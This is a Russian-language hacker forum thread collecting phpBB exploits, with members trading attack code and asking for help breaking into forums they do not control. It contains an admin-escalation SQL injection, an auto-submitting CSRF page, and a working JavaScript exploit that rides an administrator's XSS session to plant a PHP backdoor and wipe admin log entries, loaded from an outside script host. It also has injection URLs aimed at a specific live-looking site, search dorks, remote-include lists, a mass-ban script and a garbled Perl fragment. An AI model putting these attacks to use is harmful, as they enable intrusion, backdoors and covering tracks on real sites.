ANTICHAT - [Обзор уязвимостей phpBB]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей phpBB] (https://forum.antichat.xyz/showthread.php?t=24488)

Цитата:

Сообщение от DimOnOID

Отключённой в смысле? В Списке нету?..
Попробуй обраиться к срипту напрямую

Код:

admin_db_utilities.php?perform=restore&sid=сессия

Просто..встречал пару раз модифиц phpbb..Где в админке не было такого пункта.....но скрипт был)

Нет, пункт есть, прделагается указать файл и залить - однако после нажатия на кнопку просто сюда же перебрасывает и снова предлагает залить файл. Т.е. не отваливается по таймауту, не показывает ошибку, не показывает успеха, а просто снова на эту же страницу рестора БД... без понятия, что сделтьт.

Есть 2 вопроса:
1) с какой версии 2ой ветки в куках перестали храниться хэши?
2) имея куки админа, в админку версии 2.0.23 никак не зайти?

======================

Elekt пишет

1) с 2.0.19
2) в админке толи своя сессия(нужен хсс в админке), толи надо заставить админа залогиниться в админку, тогда сессия облагородится.

phpBB3 addon prime_quick_style GetAdmin Vulnerability

################################################## ########################
#
# phpBB3 addon prime_quick_style GetAdmin Exploit
#
# Vulnerability found and exploited by -SmoG-
#
# target file: prime_quick_style.php
#
#
# vuln: POST parameter "prime_quick_style" is injectable.
# source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
# gratz, now u will be an admin :)
#
# --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
# -( by -SmoG- )-
################################################## ########################

# milw0rm.com [2009-09-01]

Уязвимость: E-Mail send XSRF (CSRF) Vulnerability.
Описание: Собственно, работает лишь в phpbb2, в 3 версии уже закрыта.
Эксплойт:

Код:

<html>

<body>

<form action="http://victim.com/phpbb2/profile.php?mode=email&amp;u=userid" method="post">

<input type="text" name="subject" value="XSRF bug" />

<textarea name="message">Found by Root-access</textarea>

<input type="checkbox" name="cc_email"  value="0" checked="checked">

<input type="submit" id="xsrf" name="submit" value="O'k">

</form>

<script>document.getElementById("xsrf").click();</script>

</body>

</html>

Активный межсайтовый скриптинг и автозагрузка шелла в phpBB 3.0.x-3.0.6

1. Активный межсайтовый скриптинг phpBB 3.0.x-3.0.6.

BB-тег [flash] неотфильтрован чуть менее, чем полностью.

[flash=1,1]javascript:confirm(/lo/);//lo[/flash]

По умолчанию данный тег недоступен для зарегистрированных пользователей, но его можно разрешить для использования в личных сообщениях.

Работоспособность : Opera & Safari

Но есть ли там ещё XSS? O, да!

2. Автозагрузка шелла/ бэкдора и т.д. через XSS.

Для работы скрипта требуется, чтобы администратор был авторизован в админ. панеле.

Эксплойт реализует метод, описанный здесь: https://forum.antichat.ru/showpost.php?p=1176333&postcount=36:

* Скрипт не станет повторно добавлять php-код, если он уже имеется в шаблоне.

* В логе администратора удаляются записи только о произведенных действиях.

Шелл будет доступен по адресу: http://vulnsite.xz/forum/ucp.php?mode=login&lo=test

Также рекомендуется ознакомиться с этим https://forum.antichat.ru/showpost.php?p=1231741&postcount=37

Эксплойт:

Код:

/*/ phpBB 3.0.x-3.0.6 shell-inj.



/// Example:



    javascript:with(document) getElementsByTagName('head').item(0).appendChild( createElement('script')).src='http://yoursite.xz/shell-inj.js';void(0);



/// LeverOne. 12.2009

/*/





phpcode       =  '<!-- PHP --> if($_GET[lo]) echo($_GET[lo]); <!-- ENDPHP -->';

template_file =  'login_body.html';





// выделение базового url (директория админки и сессия) из главной страницы



get_base_url(location.pathname.substring(0, location.pathname.lastIndexOf('/') + 1)+'#');



function get_base_url(url) {

  requester('GET', url, null, 

              function() {

                if (r.readyState == 4) {

                    base_url = r.responseText.match(/\.\/.+?\?sid=.{32}/);

                    if (base_url != null)

                        get_default_style(base_url);   

                }

              }

           );

}





// получение названия стиля по умолчанию   



function get_default_style(base_url) {

  requester('GET', base_url + '&i=styles&mode=style', null, 

              function() {

                if (r.readyState == 4) {

                    default_style = r.responseText.match(/<strong>(.+?)<\/strong> \*/)[1];

                    get_templ_id(default_style, base_url);

                }

              }

           );

}





// получение id шаблона по умолчанию   



function get_templ_id(default_style, base_url) {

  requester('GET', base_url + '&i=styles&mode=template', null, 

              function() {

                if (r.readyState == 4) {

                    expr = new RegExp(default_style + '[\\w\\W]+?(id=\\d+)"', 'm');

                    templ_id = r.responseText.match(expr)[1];

                    to_edit_templ(templ_id, base_url);

                }

              }

           );

}





// на пути к редактированию шаблона...   



function to_edit_templ(templ_id, base_url) {

  requester('GET', base_url + '&i=styles&mode=template&action=edit&' + templ_id, null, 

              function() {

                if (r.readyState == 4) {



                    creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];

                    form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];

                    postdata = 'template_file=' + template_file + '&creation_time=' + creation_time + '&form_token=' + form_token;

                    edit_templ(templ_id, base_url, postdata);

                }

              }

           );

}





// редактирование шаблона   



function edit_templ(templ_id, base_url, postdata) {

  requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata, 

              function() {

                if (r.readyState == 4) {

                    template_data = r.responseText.match(/rows="20">([\w\W]+)<\/textarea/mi)[1];

                    template_data = template_data.replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&quot;/g, '"').replace(/&amp;/g, '&');

                    if (template_data.indexOf(phpcode) == -1) {

                        template_data = encodeURIComponent(template_data + phpcode);

                        creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];

                        form_token    = r.responseText.match(/form_token" value="(.+?)"/i)[1];

                        postdata      = 'template_data=' + template_data + '&template_file=' + template_file +'&creation_time=' + creation_time + '&form_token=' + form_token + '&save=1';

                        setTimeout("send_edit_templ(templ_id, base_url, '" + postdata + "')", 1000);

                    }



                }

              }

           );

}





//  отправка редактированного шаблона   



function send_edit_templ(templ_id, base_url, postdata) {

  requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata,

              function() {

                if (r.readyState == 4) {

                    to_allow_php(base_url);

                }

              }

           );

}





// переход на страницу настроек безопасности   



function to_allow_php(base_url) {

  requester('GET', base_url + '&i=board&mode=security', null, 

              function() {

                if (r.readyState == 4) {

                    creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];

                    form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];

                    postdata = 'config%5Btpl_allow_php%5D=1&submit=1&creation_time=' + creation_time + '&form_token=' + form_token;

                    setTimeout("allow_php(base_url, '" + postdata + "')", 1000);

                }

              }

           );

}





// разрешение php в настройках   



function allow_php(base_url, postdata) {

  requester('POST', base_url + '&i=board&mode=security', postdata, 

              function() {

                if (r.readyState == 4) {

                    to_delete_log(base_url);

                }

              }

           );

}





// на пути к удалению логов...   



function to_delete_log(base_url) {

  requester('GET', base_url + '&i=logs&mode=admin', null, 

              function() {

                if (r.readyState == 4) {

                    log_num = r.responseText.match(/mark\[\]" value="(\d+)/g);

                    postdata = 'mark%5B%5D='+ log_num[0].substring(15) + '&mark%5B%5D=' + log_num[1].substring(15) + '&mark%5B%5D=' + log_num[2].substring(15) + '&delmarked=1';

                    delete_log(base_url, postdata);

                }

              }

           );

}





// удаление логов   



function delete_log(base_url, postdata) {

  requester('POST', base_url + '&i=logs&mode=admin', postdata, 

              function() {

                if (r.readyState == 4) {

                    confirm_uid = r.responseText.match(/confirm_uid" value="(\d+)/i)[1];

                    sess        = r.responseText.match(/sess" value="(.+?)"/i)[1];

                    sid         = r.responseText.match(/sid" value="(.+?)"/i)[1];

                    confirm     = r.responseText.match(/confirm" value="(.+?)"/i)[1];

                    postdata    = postdata + '&confirm_uid=' + confirm_uid + '&sess=' + sess + '&sid=' + sid + '&confirm=' + encodeURIComponent(confirm);

                    confirm_key = r.responseText.match(/confirm_key=(.+?)"/i)[1];

                    confirm_delete_log(base_url, postdata, confirm_key);

                }

              }

           );

}





// подтверждение удаления логов   



function confirm_delete_log(base_url, postdata, confirm_key) {

  requester('POST', base_url + '&i=logs&mode=admin&confirm_key='+ confirm_key, postdata, null

           );

}





//  универсальная функция запроса   



function requester(method, url, postdata, func) {

  try {r = new XMLHttpRequest()} catch(err) {r = new ActiveXObject('Msxml2.XMLHTTP')}

  r.open(method, url + '&r=' + Math.ceil(1000*Math.random()));

  if (method == 'POST') r.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');   

  r.onreadystatechange = func;

  r.send(postdata);

}

Как вы понимаете, он сработает с любой XSS.

Target: phpbb2*
Dork: inurl:"kb.php?mode=cat"
Example:

Код:

http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13

SQL injection (without union+select):

Код:

http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)

Префикс таблицы kb_categories может отличаться, но его видно в ошибке

PS: актуально для 4.1<=MySQL=>5

Цитата:

Сообщение от .:[melkiy]:.

скажите где в phpbb3 раскрытия есть.. очень нужно

phpbb3 full path disclosure:

Цитата:

includes/db/mssql.php
includes/db/sqlite.php
includes/db/firebird.php
includes/db/mssql_odbc.php
includes/db/mysql.php
includes/db/mysql4.php
includes/db/mysqli.php
includes/db/postgres.php
includes/search/fulltext_phpbb.php
includes/search/fulltext_mysql.php
includes/acm/acm_main.php
includes/acp/auth.php

Версия - 2.x

Может я не увидел, и эта информация где-то должна отображатся, но всё же отпишу. Если у вас есть админка, и вам нужно узнать префикс для заливки шелла, делаем несколько банальных действий.

Общие настройки - Резервная копия БД - Копировать только структуру(пташка) - начать копирование, файл скачивается и собственно в нём уже и смотрим префикс.

Такая вот маленькая полезность. Может ещё кому пригодится.

===========================================

PHPBB 3.0.* CMS SQL Injection Vulnerability

===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection

# Date: 2010-08-27

# Team: eX.ploit ( Abjects #ex.ploit )

# Software Link: http://www.phpbb.com/

# Version: PHPBB3.0.* CMS only (does not work on FORUM only)

# Tested on: Linux

# Usage: SQLinjection

# Gain detailed database information

Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php

Url| http://www.website.com/news_view.php?id=1

Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4

# Inj3ct0r.com [2010-08-27]

так же версию продукта можно определить

forum/styles/prosilver/style.cfg

Цитата:

Сообщение от marD

так же версию продукта можно определить
forum/styles/prosilver/style.cfg

интересно.

Да действительно работает даже на версии 3.0.8

м.б. есть еще что то что можно проверить?

выдает:

Код HTML:

#

# phpBB Style Configuration File

#

# @package phpBB3

# @copyright (c) 2005 phpBB Group

# @license http://opensource.org/licenses/gpl-license.php GNU Public License

#

#

# At the left is the name, please do not change this

# At the right the value is entered

# For on/off options the valid values are on, off, 1, 0, true and false

#

# Values get trimmed, if you want to add a space in front or at the end of

# the value, then enclose the value with single or double quotes.

# Single and double quotes do not need to be escaped.

#

#



# General Information about this style

name = prosilver

copyright = &copy; phpBB Group, 2007

version = 3.0.8

не удасться ли это использовать как уязвимость?

более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden

You don't have permission to access /styles/ on this server. "

не появиось ли чего новенького для 3.0.8 ?

Цитата:

Сообщение от juffin

м.б. есть еще что то что можно проверить?

Можно проверять по второму, идущему в стандарте, стилю: forum/styles/subsilver2/style.cfg

Однако оба этих файла не могут дать твёрдой уверенности, т.к. не всегда обновляются админами при смене версии движка.

Определить версию 3.0.8 можно по косвенным признакам:

1) Наличие файла forum/web.config (*nix отдаст как текст)

2) Ошибка 403 при запросе файлов из папки forum/includes/ (например, forum/includes/functions.php), в более старых версиях открывается чистая страница (ибо exit).

Цитата:

Сообщение от juffin

не удасться ли это использовать как уязвимость?

Это не уязвимость.

Цитата:

Сообщение от juffin

более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden
You don't have permission to access /styles/ on this server. "
не появиось ли чего новенького для 3.0.8 ?

Это самодеятельность админов, в стандартной поставке файлы из папки forum/styles/ не защищены ничем

интересно. версия точно 3.0.8 все описанные выше косвенные признаки присутствуют,includes/ закрыты видимо .htaccess -ом и т.п.

довольно интересно, нет ли каких либо советов? какие то недо конца или плохо закрытые ветки ? м.б. инъекции уже появились?

phpBB 3.0.7

Код:

######################################################################

#

# PHPBB Version 3.0.7 Remote File Include !

#

# Author : D.0.M TEAM

#

# Founded By : S3Ri0uS !

#

# We Are : Inj3ct0r.com Exploit and Vulnerability Database.

#

# Public Site : WwW.Anti-Secure.CoM !

#

# Security Site : WwW.D0M-Security.CoM !

#

# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !

#

# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !

#

# SpT : All Iranian Hackers !

#

######################################################################

#

# Dork :

#

# inurl:&quot;powered by PHPBB Version 3.0.7&quot;

#

# Exploit :

#

# http://www.site.com/path/common.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/cron.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/faq.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/feed.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/index.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/mcp.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/memberlist.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/posting.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/report.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/search.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/style.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/ucp.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/viewforum.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/adm/index.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/adm/swatch.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/download/file.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/auth.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/functions.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/functions_content.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/session.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/template.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=[shell code]

#

# http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=[shell code]

#

######################################################################

SSSetuPPP, это же бред.

Файл common.php закрыт через .htaccess, во всех файлах из папки /includes/ при прямом запросе срабатывает exit, да и переопределние переменной phpbb_root_path ничего не сможет дать. Хотя указанный выше "эксплоит" ничего и не способен переопределить.

phpBB Version 3.0.7 Remote File Include Vulnerability

_http://www.inj3ct0r.com/exploits/12604

_http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

[CODE]
#!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash

Уязвимость в phpbb 2.0.19

Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.

Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.

Код:

Профиль пользователя (.*)/i",$str,$return))

{if(trim($return[1])!=**)

{fputs($file,"$return[1]\n");

}}}}

fclose($file);

fclose($sock);

?>

Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:

1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)

2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)/i",$str,$return))

в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле Юзер - Lamer

то переписываем preg_match как

preg_match("/Юзер - (.*)/i",$str,$return))

Сам сплоит

Код:

Защита

Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.

Есть какие нибудь способы заливки шелла в 3.0.9 ?

Админ аккаунт имеется..

А в 3.0.8 есть возможность залить? Админка есть

stepashka_, cylaaan =>

1. /showpost.php?p=198446&postcount=3

2. 1) Вкладка общие --> Безопасность

Разрешить php в шаблонах: Да

2)Вкладка Стили --> Компоненты стилей ->> Шаблоны

С помощью встроенного редактора шаблонов выбираем файл и пишем в него:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]phpinfo[/COLOR][COLOR="#007700"](); [/COLOR][/COLOR]

Далее применяем шаблон, идем на измененную страницу и видим наш php код

Тип: полный путь.

Необходимо:админская учётная запись.

1.)Заходим в администраторскую панель.

2.)Переходим на вкладку PHPBB SEO.

3.)Находим на этой страничке "The cache folder configured is" и после этих слов и будет полный путь.

P.S Полезно, если file_priv=Y, а пути мы не знаем

Osstudio, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения phpBB SEO от одноимённой команды www.phpbb-seo.com

Определить наличие данной модификации можно по значку http://demo.phpbb-seo.net/images/phpbb-seo.png внизу форума.

Цитата:

Сообщение от SecondLife

Osstudio
, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения
phpBB SEO
от одноимённой команды www.phpbb-seo.com
Определить наличие данной модификации можно по значку
http://demo.phpbb-seo.net/images/phpbb-seo.png
внизу форума.

А, ясно

шелл в стилях, для редактирования шаба доступны только два файла

overall_header.html и ph.html

куда они инклудятся?

Цитата:

Сообщение от faza02

шелл в стилях, для редактирования шаба доступны только два файла
overall_header.html
и
ph.html
куда они инклудятся?

путь чтоли, в /template.

нет, я не так выразился

объясню на примере

когда правили в стилях faq_body.html, то что мы исправили было по адресу /forum/faq.php

а где сейчас искать мне этот php файл?

Я думаю, что overall_header.html инклудится в index.php. Попробуй.

overall_header.html инклудится на каждой странице форума, за исключением некоторых технических. Это общая шапка.

Файла ph.html в стандартной поставке phpBB3 нет, поэтому инклудится он может куда угодно.

Да, если шелл в файле стиля прописан через теги , то ничего не выйдет, эти теги вырезаются.

там версия 3.0.6, я скачал исходники, устроил поиск по файлам, и везде где он инклудитя — файлы html, лежащие в /templates/

секондлайф, пхпкод прописан в

Код:

…

и выполнение его в настройках включено, все ок с этим

ph.html по моим догадкам это page_header.html, но и его тоже нигде не нашло

faza02, стукни в 433230838, помогу залить.

есть чо под 3,0,7?

justonline,

http://www.exploit-db.com/exploits/2007/

http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/

SecondLife, отписал.

сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый

Цитата:

Сообщение от Osstudio

сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый

тыц

больше ничего не нашел.

Как решить проблему.

Есть база данных, в ней имеется отдельная бд в этой бд phpbb. Думаю залить шелл т/к/ данные админа на руках. Проблема в том что не могу найти урл форума.

Как узнать урл форума если ты в бд форума ?

Пробовал вытащить название темы и поискать в гуугле, но результат не получен. Пробовал так же искать из phpbb_sitelist там записей 0.

Phpbb 3.0 memberlist.php SQL injection

to ex'pert

Попробуйте данный сплойт

Цитата:

Сообщение от None

Phpbb 3.0 memberlist.php SQL injection

cat1vo, спасибо! Однако порылся в других файлах сайта и оказалось что там версия 3.0.10 на самом деле((. Админ изначально пытался скрыть, но я нашел истинную версию форума. На ней старый експлоит не работает. Теперь подскажите пожалуйста на новую)

есть что то новое под 3.0.10 ?

Цитата:

Сообщение от ex'pert

есть что то новое под 3.0.10 ?

Name : phpBB3 SQL Injection

------------------------------------------------------------------

Date : 27.07.2012

------------------------------------------------------------------

Site : www.phpbb.com

------------------------------------------------------------------

Version : 3.0.10

------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!

------------------------------------------------------------------

2) Type of bug?

SQL Injection (or SQL-info-Leak if You want).

------------------------------------------------------------------

3) Where is the bug?

Vulnerable parameter seems to be 'style' because if we set up this parameter

to 'bigger number' (for example: 111111111) we will get an error, with full SQL

statement.

*updated - dateformat is the second vulnerable parameter!

*updated - post_st is the 3rd vulnerable parameter!

*updated - another one: topic_st

4) PoC traffic from Burp:

4.1) Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

---

4.2) Response:

---

HTTP/1.1 503 Service Unavailable

Date: Fri, 27 Jul 2012 06:39:06 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

Content-Length: 2889

Return to the index page

General Error

SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users

SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,

user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,

user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111

WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---

4.2 Other response (this time from post_st parameter):

---

Return to the index page

General Error

SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.

Please contact the